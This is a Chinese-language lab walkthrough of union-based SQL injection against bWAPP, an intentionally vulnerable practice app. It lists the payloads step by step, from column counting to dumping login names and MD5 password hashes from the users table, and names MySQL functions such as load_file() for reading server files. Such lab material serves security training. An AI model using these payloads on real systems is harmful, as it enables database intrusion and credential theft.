0x01:测试分析
我们进行测试这里是否存在SQL注入漏洞
输入a'
点击搜索后
报错了,说明很大可能存在SQL注入漏洞了。
0x02:爆字段(字段就是这个数据表中的列)
order by 语句
输入 a' order by 1 #
输入a' order by 7#
输入a' order by 8#
由此可以判断出,库中有7个列。
0x03:爆数据库名
使用联合查询注入union
输入a' union select 1,2,3,4,5,6,7#
可以看出是从2开始显示。
可以将2,3,5,4,替换成我们想要查询的信息
相关函数
system_user() 系统用户名
user() 用户名
current_user 当前用户名
session_user() 连接数据库的用户名
database() 数据库名
version() MYSQL数据库版本
load_file() MYSQL读取本地文件的函数
@@datadir 读取数据库路径
@@basedir MYSQL 安装路径
@@version_compile_os 操作系统
输入a' union select 1,database(),3,4,5,6,7#
可见当前数据库为bwapp
0x04:爆表(即获取当前数据表)
输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#
当前数据库(bwapp)中,有五张表,其中users比较重要。
0x05:获取后台账户用户名和密码
先查看users表的所有的列的信息
输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#
一共有9列。
其中的login和password,应该是我们有我们想要的东西。
那我们就去查出它们的信息
输入a' union select 1,login,password,4,5,6,7 from users#
获取login信息和password密码
其中密码是经过md5加密,我们需要去解密